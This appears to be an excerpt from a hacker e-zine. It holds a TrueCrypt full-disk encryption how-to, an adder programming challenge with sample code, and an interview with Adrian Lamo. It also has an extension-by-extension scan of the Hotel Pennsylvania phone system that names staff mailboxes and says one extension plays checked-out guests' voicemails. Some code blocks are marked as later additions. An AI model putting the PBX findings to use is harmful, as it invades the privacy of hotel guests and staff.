CMS>
================================================================================
907-967-8888 Goodnews Bay AK
# Siemens PBX prompt?

CMS>
================================================================================
909-390-0047 FRIDAY'S

[blank]

[==================================================================================================]

-=[ 0x0a Linux Full-Disk Encryption Using TrueCrypt
-=[ Author: second
-=[ IRC: irc.distrust.us #gny
-=[ IRC: irc.digitalrebels.org #null

= Introduction =

This is a HOW-NOT to leave your root filesystem unencrypted. For this I'm using Arch Linux, but it should be easily ported to other Linux distributions.
I've created a TrueCrypt init hook to go with the mkinitcpio that is made for Arch Linux - many other distros have something similar to this. It's basically a set of scripts and binaries run before init to prepare the system (mount filesystems, decrypt the root filesystem, etc. It can even do NFS root filesystems), and then calls init (runs graphical login manager or consoles, etc.).

Pre-requisites:

* Live CD/USB or a system already running Arch Linux (You aren't restricted to just Arch Linux, but that's what I'm using. If you know what you're doing, you can reference the wiki article http://wiki.archlinux.org/index.php/Install_from_Existing_Linux and improvise.)
* Root access
* An internet connection or local access to the TrueCrypt packages/binaries
* Patience. ALWAYS double check your commands.

It would help you to know how to:

* Use the command line
* Partition a drive
* Create a filesystem on a partition

Now that you have what you need, let's begin. I'm going to create a bootable system on another drive that has the root filesystem encrypted with TrueCrypt. This HowTo is intended for hard drives, but it should also work with a USB device with a few changes.

WARNING: I am in no way responsible for your actions, data loss, or whatever. USE THIS AT YOUR OWN RISK. Now that the disclaimer is out of the way...

= Formatting and Partitioning The Disk =

# ls /dev/sd*
/dev/sda  /dev/sda1  /dev/sda2  /dev/sdb  /dev/sdb1

/dev/sdb is the drive I'll be installing to. It may be different on your system, so be sure to check using `fdisk -l`. I suggest you have a drive that is at the very minimum 2G. 4G is better (that's what I'm using).

First, I need to format my drive with a /boot partition (I'll use 300M, although it could be smaller; I tend to store other things there too sometimes) and a partition for the root filesystem.

NOTE: If your /boot is too small, you will have to come back to this step and do it over again. It needs enough room for one kernel and two initrds which, because they hold TrueCrypt and all the necessary libraries for TrueCrypt, may become quite large. Keep in mind that /boot stays unencrypted: the kernel, the initrd and the TrueCrypt hook inside it are exactly what someone with physical access to the drive can modify, so this setup protects the data at rest, not against a tampered bootloader or initrd.

== Partitioning ==

I will use fdisk for partitioning my drive. Replace /dev/sdb with whichever drive you are using.

# fdisk /dev/sdb

Command (m for help): m
Command action
   a   toggle a bootable flag
   b   edit bsd disklabel
   c   toggle the dos compatibility flag
   d   delete a partition
   l   list known partition types
   m   print this menu
   n   add a new partition
   o   create a new empty DOS partition table
   p   print the partition table
   q   quit without saving changes
   s   create a new empty Sun disklabel
   t   change a partition's system id
   u   change display/entry units
   v   verify the partition table
   w   write table to disk and exit
   x   extra functionality (experts only)

Command (m for help): o
Building a new DOS disklabel with disk identifier 0x3a67b018.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.

Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)

Command (m for help): n
Command action
   e   extended
   p   primary partition (1-4)
p
Partition number (1-4, default 1): 1
First sector (2048-7856126, default 2048):
Using default value 2048
Last sector, +sectors or +size{K,M,G} (2048-7856126, default 7856126): +300M

Command (m for help): n
Command action
   e   extended
   p   primary partition (1-4)
p
Partition number (1-4, default 2): 2
First sector (616448-7856126, default 616448):
Using default value 616448
Last sector, +sectors or +size{K,M,G} (616448-7856126, default 7856126):
Using default value 7856126

Command (m for help): a
Partition number (1-4): 1

Command (m for help): w
The partition table has been altered!

Calling ioctl() to re-read partition table.
Syncing disks.

# fdisk -l /dev/sdb

   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   *        2048      616447      307200   83  Linux
/dev/sdb2          616448     7856126     3619839+  83  Linux

== Creating a /boot ==

Next, I create an ext3 filesystem on /boot:

# mkfs.ext3 -L shadowboot /dev/sdb1

== Encrypting root ==

At this point, you may need to load the fuse module that TrueCrypt uses (it may autoload on its own though).

# modprobe fuse

It shouldn't output anything, and if it does, you have a problem. Make sure it's installed. :3

Then, create a TrueCrypt container for the root filesystem.

# truecrypt -t -c /dev/sdb2

Follow through the instructions provided and create a "Normal" volume. The rest of the options are up to the user. This will format the drive, erasing all data on it. TrueCrypt wipes the drive unless told not to using the --quick option, so use --quick if you feel inclined. (Note that --quick skips overwriting the partition, so whatever plaintext was on it before stays recoverable in the space the new filesystem hasn't written yet; don't skip the wipe on a disk that held anything sensitive.)

NOTE: The password is everything, so don't make it too short or use a dictionary word, and don't use a keyfile unless you have somewhere safe to store it like a flash drive or something. Also, NEVER store the keyfile in /boot (should be a given). It's like leaving the key to a safe in the keyhole.

If you chose "None" as the filesystem, or if you want another filesystem, then you need to format it after mounting the device.

== Formatting Root ==

Open the container:

# truecrypt -t --filesystem=none --slot=15 /dev/sdb2    # Remember this slot number for later

There should now be a /dev/mapper/truecrypt15 block device. This is the container. If you are not satisfied with the filesystem or don't have one, reformat it to your liking. I used btrfs because of the compression. At the time of this writing, however, I don't suggest you do the same because btrfs is still in development and potential bugs may cause data loss.

# mkfs.btrfs -L shadowcrypt /dev/mapper/truecrypt15

= Mounting The Filesystems =

Now that the crypt is opened and formatted, mount the device.

# mkdir /newarch
# mount /dev/mapper/truecrypt15 /newarch

If you are using btrfs like me and want compression, do this instead:

# mount -t btrfs -o compress /dev/mapper/truecrypt15 /newarch

NOTE: I used subvolumes on mine. ;) Let's see if you can figure out how to do it (only for btrfs).

Mount /boot:

# mkdir /newarch/boot && mount /dev/sdb1 /newarch/boot

= Installing ArchLinux =

Now, install the system to /newarch. Most of this comes from the Arch Linux wiki (http://wiki.archlinux.org/index.php/Install_from_Existing_Linux). If you aren't comfortable with these commands, then read the --help. Basically, all the following does is ready the system for pacman (the Arch Linux package manager); install the base system with TrueCrypt and sudo; mount the proc, sys, and dev directories; chroot into the system; install the kernel (again); install the TrueCrypt hook for the initrd; and install grub. :)

First, edit /etc/pacman.d/mirrorlist and uncomment a mirror to download packages from.

# mkdir -p /newarch/var/lib/pacman
# pacman -Syy -r /newarch
# pacman -S base grub2 base-devel truecrypt sudo -r /newarch
# cd /newarch/dev
# rm console; mknod -m 600 console c 5 1
# rm null; mknod -m 666 null c 1 3
# rm zero; mknod -m 666 zero c 1 5
# cp /etc/resolv.conf /newarch/etc/resolv.conf
# cd /newarch
# mount -t proc proc proc/
# mount -t sysfs sys sys/
# mount --bind /dev/ dev/
# chroot . /bin/bash
# pacman -S kernel26    # should already be installed but double check
# useradd --home /build/ --create-home --user-group build
# mkdir -p /build/build/mkinitcpio-truecrypt/
# cd /build/build/mkinitcpio-truecrypt/
# wget http://aur.archlinux.org/packages/mkinitcpio-truecrypt/mkinitcpio-truecrypt.tar.gz
# tar -xvzf mkinitcpio-truecrypt.tar.gz
# chown -R build:build /build/
# sudo -u build makepkg
# pacman -U ./mkinitcpio-truecrypt*.pkg.tar.*
# grub-install --no-floppy /dev/sdb    # Remember to use -your- device here

= Configuring Grub2 =

Edit /boot/grub/grub.cfg and add

    tcdevice=<device>:<slot>

to the command line boot arguments (the line starting with linux within a menuentry block), and change "root=" to "root=/dev/mapper/truecrypt<slot>".

WARNING: Sometimes devices can change device nodes after boot. It is HIGHLY recommended that you do persistent block device naming. You can learn more about this at http://wiki.archlinux.org/index.php/Persistent_block_device_naming#by-id_and_by-path. TrueCrypt volumes don't have a UUID, so use by-id because that will work on just about any computer (great for USBs). Your tcdevice should end up looking like "tcdevice=/dev/disk/by-id/<id>:<slot>". It would also benefit you to replace "root=/dev/mapper/truecrypt<slot>" with the UUID of your root filesystem. Use the `blkid` command to find this information.

NOTE: TrueCrypt has a maximum slot number of 64 and starts at 1, so stay within that range.

= Configuring the System =

Now that the system is installed, it's time to make the initial ramdisk (initrd). Edit /etc/mkinitcpio.conf, read the notes, and add 'truecrypt' before 'filesystems' in the HOOKS string. If you are using a USB stick, add 'usb' before 'truecrypt' and 'filesystems' (they are run in the order given in the array).
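Since the grub.cfg and mkinitcpio.conf edits above are the two places where a typo leaves you with an unbootable box, here is an added example (mine, not from the article or from the mkinitcpio-truecrypt package) of two POSIX sh helpers that produce those edits from checked inputs: one builds the kernel arguments from a slot number, a by-id name and the root filesystem UUID and refuses slots outside TrueCrypt's 1-64 range, the other inserts a hook directly before 'filesystems' in a HOOKS line and is safe to run twice. The tcdevice=<device>:<slot> argument format and the sample HOOKS line are assumptions, not taken from the package.

```shell
#!/bin/sh
# Added example, not the article's or the hook package's own code.
# Assumption: the hook expects tcdevice=<device>:<slot> and root=UUID=<uuid>.

# tc_kernel_args <slot> <by-id name> <root fs UUID>
# Prints the two kernel arguments for grub.cfg, or fails (status 1) when the
# slot is not a number in TrueCrypt's 1..64 range.
tc_kernel_args() {
    slot=$1
    dev_id=$2
    root_uuid=$3
    case "$slot" in
        ''|*[!0-9]*) echo "tc_kernel_args: slot must be a number" >&2; return 1 ;;
    esac
    if [ "$slot" -lt 1 ] || [ "$slot" -gt 64 ]; then
        echo "tc_kernel_args: slot $slot is outside 1-64" >&2
        return 1
    fi
    printf 'tcdevice=/dev/disk/by-id/%s:%s root=UUID=%s\n' "$dev_id" "$slot" "$root_uuid"
}

# add_initcpio_hook <HOOKS line> <hook>
# Prints the HOOKS="..." line with <hook> inserted directly before
# 'filesystems'.  A hook that is already present is left where it is, so
# re-running the function does not duplicate it.  Because each call inserts
# right before 'filesystems', add 'usb' first and 'truecrypt' second to get
# the order the article asks for.
add_initcpio_hook() {
    line=$1
    hook=$2
    inner=${line#*\"}          # strip up to the opening quote ...
    inner=${inner%\"*}         # ... and from the closing quote onwards
    case " $inner " in
        *" $hook "*) printf '%s\n' "$line"; return 0 ;;
    esac
    case " $inner " in
        *" filesystems "*) ;;
        *) echo "add_initcpio_hook: no 'filesystems' hook in line" >&2; return 1 ;;
    esac
    printf '%s\n' "$line" | sed "s/ filesystems/ $hook filesystems/"
}

# Demonstration on a constructed HOOKS line (the stock Arch default of the
# time is assumed; check your own /etc/mkinitcpio.conf).
sample='HOOKS="base udev autodetect pata scsi sata filesystems"'
hooks=$(add_initcpio_hook "$sample" usb)
hooks=$(add_initcpio_hook "$hooks" truecrypt)
echo "$hooks"
# To apply for real (both names are placeholders for your own values):
#   args=$(tc_kernel_args 15 ata-YOUR_DISK-part2 YOUR-ROOT-FS-UUID) || exit 1
#   sed -i "s|^HOOKS=.*|$hooks|" /etc/mkinitcpio.conf
# then paste $args onto the linux line of the menuentry in /boot/grub/grub.cfg.
tc_kernel_args 15 ata-YOUR_DISK-part2 YOUR-ROOT-FS-UUID
```

The by-id name printed by `ls -l /dev/disk/by-id/` is what goes into the second argument; the whole point of validating the slot here is that a slot outside 1-64 makes the hook fail at boot, where you have no shell to fix it from.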
NOTE: If you are using a btrfs root filesystem, then add the following to the MODULES string:

    crc32c libcrc32c zlib_deflate btrfs

Now for the kernel:

# mkinitcpio -p kernel26

Read the Arch Linux wiki link above and install whatever else you want and edit the settings. And add the devices to fstab. Chances are the device nodes in /dev/ will change (e.g. sdb to sda etc.), so I suggest you use persistent names: by-id for the tcdevice in the kernel command line args, and UUID in fstab.

...And that should be it! If you have any trouble, feel free to contact me in the IRC channels listed at the top of the article. If you want, you can also check #archlinux on irc.freenode.net and see if anyone around can help you there.

'Tis all from second. And remember, nothing is impossible with God (whatever, haters gonna hate).

[==================================================================================================]

-=[ 0x0b Programming Challenge
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/

In Computer Science (and electronics in general), an adder is a circuit by which simple addition is performed by passing input bits through a series of logic gates (e.g., AND, OR, XOR) and returning the result. Many different adder designs exist, depending on what exactly you are trying to achieve. Your challenge this issue is to further research adders and write a program that performs addition of inputted bits using only logic gates. Three levels of this challenge exist, each one being progressively more complex to code.

Level 1: Write a half adder

A half adder is the simplest adder circuit. It accepts two input bits A and B and returns two output bits S and C. S stands for the "sum" of the two bits, and C stands for the "carry" bit (if produced). The logical design of a half adder is very simple and easy to follow, but a key shortcoming is that it does not accept a carry bit as input, so its use in calculation is limited.
A black box diagram of a half adder would look like:

       ______________
      |              |
A --->|              |---> S (sum)
      |  Half Adder  |
B --->|              |---> C (carry)
      |______________|

Level 2: Write a full adder

A full adder is a more complex adder circuit that returns the same output as a half adder but accepts a carry bit as input. Because of this, full adders are more universally implemented. A full adder accepts three input bits A, B, and Cin (carry input) and returns two output bits S (sum) and Cout (carry output).

A black box diagram of a full adder would look like:

       ______________
      |              |
A --->|              |---> S (sum)
      |  Full Adder  |
B --->|              |---> Cout (carry out)
      |______________|
             ^
             |
            Cin (carry in)

Level 3: Write a ripple carry adder

A ripple carry adder is essentially a series of full adders that is able to perform addition on binary numbers with multiple digits. When one full adder completes its computation, the carry out bit is then passed to the next full adder as the carry in bit. Because there is no carry in bit for the addition of the first digits, a half adder may be the first (but only the first) step in a ripple carry adder.

A black box diagram of a ripple carry adder would look like:

            A2      B2           A1      B1           A0      B0
            |       |            |       |            |       |
          __\/______\/__       __\/______\/__       __\/______\/__
         |              |     |              |     |              |
   C3    |              |  C2 |              |  C1 |              |
... <----|  Full Adder  |<----|  Full Adder  |<----|  Full Adder  |<---- C0
         |              |     |              |     |              |
         |______________|     |______________|     |______________|
                |                    |                    |
                \/                   \/                   \/
                S2                   S1                   S0

Submissions may be written in any programming or scripting language. Correct, acceptable, and innovative solutions will be published in the next issue of GNY Zine, and their authors will be recognized.
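To make the three levels concrete, here is an added example in Python (mine, not a reader submission and not part of the zine) that builds all three adders out of nothing but AND, OR and XOR gate functions, exactly as the diagrams wire them. The bit-list helpers to_bits/from_bits, the 8-bit width in add_ints and the choice to feed C0 into a full adder for the first stage (as the ripple diagram shows) are my own choices.

```python
# Added example: half, full and ripple-carry adders built only from gate
# functions.  Bits are Python ints 0 or 1; lists are least-significant first.

def AND(a, b):
    return a & b

def OR(a, b):
    return a | b

def XOR(a, b):
    return a ^ b

def half_adder(a, b):
    """Level 1: two input bits -> (S, C).  Sum is A XOR B, carry is A AND B."""
    return XOR(a, b), AND(a, b)

def full_adder(a, b, cin):
    """Level 2: two half adders in series.  The two carries are ORed because
    at most one of them can be set for any input.  Returns (S, Cout)."""
    s1, c1 = half_adder(a, b)
    s, c2 = half_adder(s1, cin)
    return s, OR(c1, c2)

def ripple_carry_add(a_bits, b_bits, c0=0):
    """Level 3: add two equal-width bit lists, index 0 = least significant
    (A0, B0 in the diagram).  Each stage's carry out becomes the next stage's
    carry in; the first stage takes c0, which is 0 unless you chain adders.
    Returns (sum_bits, carry_out)."""
    if len(a_bits) != len(b_bits):
        raise ValueError("operands must have the same width")
    sums = []
    carry = c0
    for a, b in zip(a_bits, b_bits):
        s, carry = full_adder(a, b, carry)
        sums.append(s)
    return sums, carry

def to_bits(n, width):
    """Unsigned integer -> bit list, least significant first (helper)."""
    if not 0 <= n < (1 << width):
        raise ValueError("value does not fit in %d bits" % width)
    return [(n >> i) & 1 for i in range(width)]

def from_bits(bits):
    """Bit list (least significant first) -> unsigned integer (helper)."""
    return sum(b << i for i, b in enumerate(bits))

def add_ints(x, y, width=8):
    """Add two unsigned integers through the ripple-carry adder.  The carry
    out doubles as the overflow flag: 1 means the true sum needs width+1 bits,
    and the returned value is the sum modulo 2**width."""
    sums, cout = ripple_carry_add(to_bits(x, width), to_bits(y, width))
    return from_bits(sums), cout

if __name__ == "__main__":
    for x, y in ((5, 7), (200, 100)):
        total, overflow = add_ints(x, y)
        print("%3d + %3d = %3d (8-bit), carry out = %d" % (x, y, total, overflow))
```

The overflow case is the one worth trying: 200 + 100 does not fit in eight bits, so the adder returns 44 with the carry out set, which is the same wrap-around a fixed-width register shows.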
Solutions may be submitted by:

- Forum (http://gonullyourself.org/board/)
- IRC (irc.distrust.us #gny)
- Email (zine@gonullyourself.org)

Excellent resources for further information on adders and logic gates:

http://en.wikipedia.org/wiki/Adder_%28electronics%29
http://en.wikipedia.org/wiki/Logic_gate
http://www.play-hookey.com/digital/adder.html

--------------------------------------------------------------------------------

Last issue, I challenged readers to write a program that would generate elementary cellular automata and display the resulting figures in a dynamic and interesting fashion. One submission was received from ardnew, who wrote a program in php that generates a cellular automaton by controlling the background color of cells in HTML tables.

-=-=-

<?php
// NOTE: the opening of this script (PHP tag, the two constants and the head
// of int2bitvec) and the HTML markup inside the echo strings were lost when
// the zine was extracted; those parts are reconstructed below, the rest is
// as submitted.

$NUM_RULES = 8;     // eight 3-cell neighbourhoods, so a rule number is 8 bits
$NUM_LINES = 32;    // generations to draw (assumed value; the original was lost)
$rule_table = array();

// Split integer $n into an array of $len bits, least significant bit first
function int2bitvec($len, $n)
{
    $s = array();
    for($l = 0; $l < $len; ++$l)
    {
        $s[] = (($n >> $l) & 1);
    }
    return $s;
}

// Bit vector back to a string, most significant bit first
function bitvec2str($s)
{
    return join('', array_reverse($s));
}

// Fill $rule_table: neighbourhood string ("000" .. "111") => next cell state,
// taken from bit $i of rule number $n (Wolfram's numbering)
function build_rules($l, $n)
{
    global $rule_table;
    $v = int2bitvec($l, $n);
    $bits = (int) round(log($l, 2));   // rounded so a float log() can't add a bit
    for($i = 0; $i < $l; ++$i)
    {
        $t = int2bitvec($bits, $i);
        $rule_table[bitvec2str($t)] = $v[$i];
    }
}

// Width of generation $i: the figure grows by one cell on each side per line
function line_length($i)
{
    return 2 * $i + 1;
}

echo '<html>';
echo '<head><title>Linear Cellular Automata</title>';
echo '<style>td { width: 4px; height: 4px; } .on { background: black; } .off { background: white; }</style>';
echo '</head>';
echo '<body>';
echo '<form method="get">';
echo 'Enter a rule (0-255): ';
echo '<input type="text" name="n" size="3" />';
echo '<input type="submit" value="Draw" />';
echo '</form>';

if(isset($_GET['n']))
{
    echo '<table cellspacing="0" cellpadding="0">';
    $n = ((int) $_GET['n']) & 255;   // untrusted input: force it into 0-255
    build_rules($NUM_RULES, $n);
    $prev_line = '';
    $curr_line = '1';
    $pad_print = '';
    $line_print = '';
    $pad = "";
    for($i = 0; $i < $NUM_LINES; ++$i)
    {
        echo '<tr>';
        $prev_line = $curr_line;
        $curr_line = '';
        // zero padding so that every row has the same number of cells
        $pad = str_repeat('0', (int) (((line_length($NUM_LINES) + 2) - line_length($i)) / 2));
        $pad_print = preg_replace('/0/', '<td></td>', $pad);
        // live cells get the "on" class, dead cells the "off" class (the "on"
        // markup must not contain a '0' or the second replacement would eat it)
        $line_print = preg_replace('/1/', '<td class="on"></td>', $prev_line);
        $line_print = preg_replace('/0/', '<td class="off"></td>', $line_print);
        echo($pad_print . $line_print . $pad_print);
        // next generation: look up each 3-cell window of the padded row
        for($c = 0, $j = (line_length($NUM_LINES) - line_length($i)) / 2 - 1; $c < line_length($i + 1); ++$c, ++$j)
        {
            $curr_line .= $rule_table[substr($pad . $prev_line . $pad, $j, 3)];
        }
        echo '</tr>';
    }
    echo '</table>';
}
echo '</body>';
echo '</html>';
?>

[==================================================================================================]

-=[ 0x0c Exploring Hotel Pennsylvania's PBX
-=[ Author: Shadytel, Inc
-=[ Website: http://www.shadytel.com/

What better time to have fun with Hotel Penn's phone system than at the Hackers on Planet Earth conference? We found that the PBX was very buggy and inconsistent, leading to some weird findings. For instance, some extensions are able to be dialed directly from within the hotel (at a courtesy phone), while others are unreachable from the IVR prompt but become reachable if dialed by the operator. Also, some extensions are only reachable via IVR prompt. Sometimes, preceding an extension with 9 will drop you to that extension's voicemail, and pressing # during a VMB greeting sends you to the IVR. The PBX will drop you back to the IVR prompt if it encounters any unhandled exceptions. Extension 555 is the name directory; 654 may be used to listen to voicemails of any checked out guest; and 632 ("Sandy Simmons") is the admin extension, but we weren't able to access it.

100 - VMB - "Express Checkout"
101 - VMB - "Express Checkout"
102 - VMB - "Express Checkout"
103 - VMB - "Express Checkout"
104 - VMB - "Express Checkout"
105 - VMB - "Express Checkout"
106 - VMB - "Express Checkout"
107 - VMB - "Express Checkout"
108 - VMB - "Express Checkout"
109 - VMB - "Express Checkout"
120 - ring out
190 - ring out
198 - ring out
199 - ring out
8600 - HELO - "Sky Top Ballroom"
8601 - VMB
8602 - HELO
8603 - VMB - "18th floor" (the extension dialed from)
8604 - VMB
8605 - VMB
8606 - VMB
8607 - reorder
8608 - VMB
8609 - VMB
8610 - reorder
8611 - VMB
8612 - VMB
8613 - HELO - "Domino's Pizza" (lol)
8614 - VMB
8615 - VMB
8616 - reorder
8617 - VMB
8618 - VMB
8619 - VMB
8620 - VMB
8621 - VMB - "Gary Smith"
8622 - VMB - "Tina"
8623 - VMB - "Sam ???"
8624 - reorder
8625 - reorder
8626 - VMB
8627 - reorder
8628 - reorder
8629 - reorder
8630 - reorder
8631 - ring out
8632 - ring out
8633 - VMB
8634 - VMB
8635 - ring out
8636 - reorder
8637 - reorder
8638 - VMB
8639 - reorder
8640 - VMB
8641 - VMB
8642 - VMB
8643 - VMB
8644 - reorder
8645 - VMB
8646 - VMB
8647 - VMB
8648 - ring out
8649 - reorder
8650 - IVR
8651 - reorder
8652 - VMB
8653 - reorder
8654 - "Security" (not sure if HELO or VMB, hung up quickly)
8655 - reorder
8656 - VMB
8657 - ring out
8658 - ring out
8659 - ring out
8660 - VMB - "Joanna Kyen"
8661 - VMB - "Penn Plaza Pavillion"
8662 - VMB
8663 - VMB
8664 - HELO
8665 - HELO
8666 - HELO - "4th floor"
8667 - HELO - "?th floor"
8668 - HELO - "Seven"
8669 - HELO - "This is seven"
8670 - HELO
8671 - ring out
8672 - ring out
8673 - HELO
8674 - HELO
8675 - HELO
8676 - IVR
8677 - reorder
8678 - ring out
8679 - HELO
8680 - reorder
8681 - reorder
8682 - reorder
8683 - ring out
8684 - reorder
8685 - VMB
8686 - VMB
8687 - VMB
8688 - ring out
8689 - IVR
8690 - reorder
8691 - reorder
8692 - reorder
8693 - VMB
8694 - VMB - "medical manager Matt Rowes"
8695 - VMB - "Diana Carpenter"
8696 - reorder
8697 - reorder
8698 - reorder
8699 - reorder
8800 - ring out
8801 - ring out
8802 - reorder
8803 - VMB
8804 - VMB
8805 - reorder
8806 - reorder
8807 - ring out
8808 - IVR
8809 - reorder
8810 - IVR
8811 - HELO - "I don't want any!" *hangup*
8812 - reorder
8813 - IVR
8814 - reorder
8815 - operator
8816 - IVR
8817 - reorder
8818 - busy (the extension dialed from)
8819 - IVR
8820 - reorder
8821 - reorder
8822 - operator
8823 - reorder
8824 - HELO - "Sup girl, sup? Uhhhhhhhhhhhhhhhhhh.........................."
8825 - IVR
8826 - VMB
8827 - reorder
8828 - reorder
8829 - IVR
8830 - IVR
8831 - reorder
8832 - ring out
8833 - ring out
8834 - reorder
8835 - IVR
8836 - reorder
8837 - ring out
8838 - reorder
8839 - reorder
8840 - reorder
8841 - reorder
8842 - IVR
8843 - IVR
8844 - ring out
8845 - IVR
8846 - IVR
8847 - IVR
8848 - reorder
8849 - reorder
8850 - IVR
8851 - IVR
8852 - IVR
8853 - IVR
8854 - IVR
8855 - IVR
8856 - IVR
8857 - IVR
8858 - VMB
8859 - IVR
8860 - IVR
8861 - IVR
8862 - IVR
8863 - IVR
8864 - beep beep beep
8865 - IVR
8866 - IVR
8867 - reorder
8868 - reorder
8869 - IVR
8870 - IVR
8871 - IVR
8872 - IVR
8873 - reorder
8874 - IVR
8875 - IVR
8876 - IVR
8877 - IVR
8878 - IVR
8879 - IVR
8880 - reorder
8881 - VMB
8882 - reorder
8883 - IVR
8884 - VMB
8885 - reorder
8886 - VMB
8887 - reorder
8888 - operator
8889 - reorder
8890 - Hotel Expert, asks for password
8891 - Hotel Expert, asks for password
8892 - Hotel Expert, asks for password
8893 - reorder
8894 - Hotel Expert, asks for password
8895 - reorder
8896 - reorder
8897 - reorder
8898 - VMB
8899 - VMB

[==================================================================================================]

-=[ 0x0d Interview with Adrian Lamo

With all of the recent news about Wikileaks, who hasn't heard of Adrian Lamo? But this isn't the first time he's made national headlines. We set out to learn more about Adrian himself, his past as a high-profile hacker, and his thoughts on current debates in the scene today.

Before we began, Adrian wanted to express:

I'd like to point you to three hyperlinks that you can read at your leisure - perhaps while I type answers - they're brief. They're essential to understanding me, in a way.

One is about why I answer in hyperlinks so often. Someone I respect wrote it. It's: http://lucidstranger.blogspot.com/2007/02/poem-experience.html

The 2nd is about not rushing to put me on a pedestal or demonize me too quickly. I'm human, like everyone else.
http://users.resist.ca/~adrian/kokoro.htm

The last is about interpreting my words. It's: http://adrian.adrian.org/zot.htm

What is your opinion on the disclosure of vulnerabilities and proof-of-concept exploits? Do you believe in full disclosure, and should security researchers notify affected vendors prior to their announcements?

I believe in a general principle of courtesy, and ensuring that announcements/disclosures don't adversely affect users by way of unpatched vulnerabilities. However, vendors with a history of working poorly with the security community or engaging in poor corporate citizenship should periodically be made examples of. After all, if you can't be a good example, you can always be a terrible warning.

I'm generally in favor of full disclosure, with the repeated caveat that we should be gentlemen about it. That being said, full disclosure and proofs-of-concept when no patch exists isn't/aren't always inappropriate. The security community - on all levels - does not exist to guarantee safety for all. Sometimes it's healthy for entities to learn that they're vulnerable via a phone call from the press. Part of the mission of the security community is inherently to irritate, and in so doing, force the creation of pearls; to produce corporate, technological, and societal evolution. It is not here to make failure painless and lesson-free.

If you have watched Hackers Wanted, my closing monologue is something of an example of what I'm talking about here.

Many news stories talk about the curiosity you possess in everything, not just computers. What is the most interesting thing you have ever found and/or accessed in your urban explorations?

The most famous one is, of course, the kitten that's covered in Kevin Mitnick's book. But my favorite memory is an abandoned power plant along the banks of the James River in Richmond, VA. It was very steampunk, with labyrinthine tunnels and floors that gave way to deep underlevels.
I explored it for days on end, taking pictures. Sometimes you'd turn corners and be confronted with a ghostly figure, only to realize it was an amazingly detailed mural barely illuminated in the twilight. Dominion Power, I miss you.

Of course, they're all unique in their own way, and they're all fading, one by one, sometimes literally, as the song goes, paved ... and put up a parking lot. The InformationWeek cover story on me had its photos shot in one of my abandoned buildings literally as crews were tearing it down. Google Earth shows a parking structure there today. The Western Union Telegraph (yes, just telegraph, no money orders when it was built) building in Philly is gone, more gentrification. Thanks gentrification, we needed that Starbucks.

My most surreal one was in the roof of the cathedral at the Cathedral of Learning in Pittsburgh. The trash and debris got older and older as you made your way through. I popped out the other end through a ventilation shaft ... in the (empty, at that hour) network room.

Like I said, all unique, all dwindling, never to be repeated.

What motivated you to become a hacker? Was there anyone in your life who served as an inspiration?

Nothing motivated me. I always was. It's something you're born into, not something you can ape with any number of classes or certifications. You have to love learning.

I never had any heroes or inspirations. It's still surreal to me when ex-LoD/H people contact me - I grew up reading old Legion of Doom Technical Journals on BBS systems - but they're just people, like me. The only person who really stirred my love of technology - apart from my dad - was my 9th grade computer science teacher, Douglas Keachie. We were nominally enemies at the time, but the adversity inspired me to learn. We remember each other much more fondly 15 years later. ;>

Have you ever dabbled in other disciplines of technology, such as phone phreaking or hardware hacking?

The short answer is yes.
I'd refer you to paragraph 2 of: http://www.sfweekly.com/2003-04-16/news/a-duty-to-hack/2/ - some of the things that run our country are very vulnerable. The FBI intervened before I was able to make a disclosure. I don't know if I ever will. I do know that sources tell me not much has changed.

Do you regularly attend any hacking conferences other than HOPE? Which conference (and year) has been your favorite, and why?

I attend Defcon, and I've enjoyed Summercon. Defcon V, my first Defcon, was undoubtedly also my favorite one in the Defcon series. It was on the cusp before Defcon turned more corporate, and it was my first real hacking conference. It had everything - getting mistaken for a fugitive, being stranded in Vegas, meeting new people, and simply being anonymous - meeting people with no preconception of what type of person I am.

In terms of HOPE, I enjoyed this year the most. It was epic-level fun. I enjoyed every minute of it. Many more people were quietly friendly than were vocally intrusive. I don't think the latter realized how much of a kick I got out of them. I will say, it was funny to see the reactions of anti-Adrian people at the panel. I don't really consider them anti-Adrian. To be anti-Adrian, they'd have to know Adrian. They know my persona, my public preconceptions, my idoru. None of these things are me. Because of this, there's a certain disconnect when they speak out - to me, they're talking about someone else.

How has being diagnosed with Asperger's Syndrome affected your life? Do you believe it plays a role in your hacker mindset?

I honestly don't know yet. It's too soon for me to say how it's affected my life, if at all. I feel I understand myself better. But I still think the word is a label for something we don't fully understand.

Do you believe that formal education plays a positive or negative role in the learning experience of hackers, and why?
I think formal education plays a positive role in the learning experience, but not in the way that's strictly intended. Nobody ever learned to be a great writer in English class. Instead, it prepares differently oriented minds for adversity, and for taking unintended lessons from human events - something that's very hackerish, in my opinion, learning to sink or swim at the art of gleaning value from a wasteland of ineffective techniques and irrelevant data.

The media has frequently referred to you as the "homeless hacker" for sleeping in abandoned buildings and traveling the country via bus. Are you still upholding this lifestyle, and do you recommend it to others?

I don't recommend anything to others, beyond making their own choices and enriching the total of human events by seeking out new situations, circumstances, and experiences. I still travel by bus and rail, but couch surf more than I crash in random places. I haven't stopped, but I don't have time for it to be a lifestyle anymore. And, more importantly, it's no longer new to me - I want to keep my brain active and engaged with new approaches to life, rather than repeating the old.

We've mainly avoided the issue with Wikileaks and Bradley Manning. However, is there anything you wish to say about the situation? Also, before the whole ordeal, if you were to switch places with Manning, would you have leaked the Collateral Murder video and diplomatic cables yourself?

Because I'm not Manning, and can't switch places with him, or go back in time, I can't say what I would do in his place. However, based on my previous actions, I would never have released the cables. PFC Manning has a good heart, but not a good sense of justice, perspective, or loyalty. That said, if he had just leaked the so-called Collateral Murder video, I would not have exposed his actions, because that was a fairly harmless leak, and the harm to him would outweigh any potential harm prevented.

Thank you for your time.
Is there anything else you would like to add before we conclude?

The only thing I'll add is that sometimes in life, you're presented with no good choices, only less-bad ones, and you'll be hated by some sectors no matter what you do. I took the menu of bad choices and elected the one I felt served the needs of the many. No one can know what that's like until they've had to make that call.

-=-=-

If you would like to weigh in on the interview, the Wikileaks controversy, or anything Adrian-related, our contact information is in the introduction - we will publish intelligent arguments and opinions (both for and against) in the next issue.

[==================================================================================================]

-=[ 0x0e Et Cetera, Etc.
-=[ Author: teh crew

With the rant finished from last issue's Et Cetera, Etc., this time we're just going to throw a bunch of whatever in here and see what happens. A bit of personalization, ya know? ;)

GNY goes to HOPE!
----------------------------------------------------------------------------------------------------

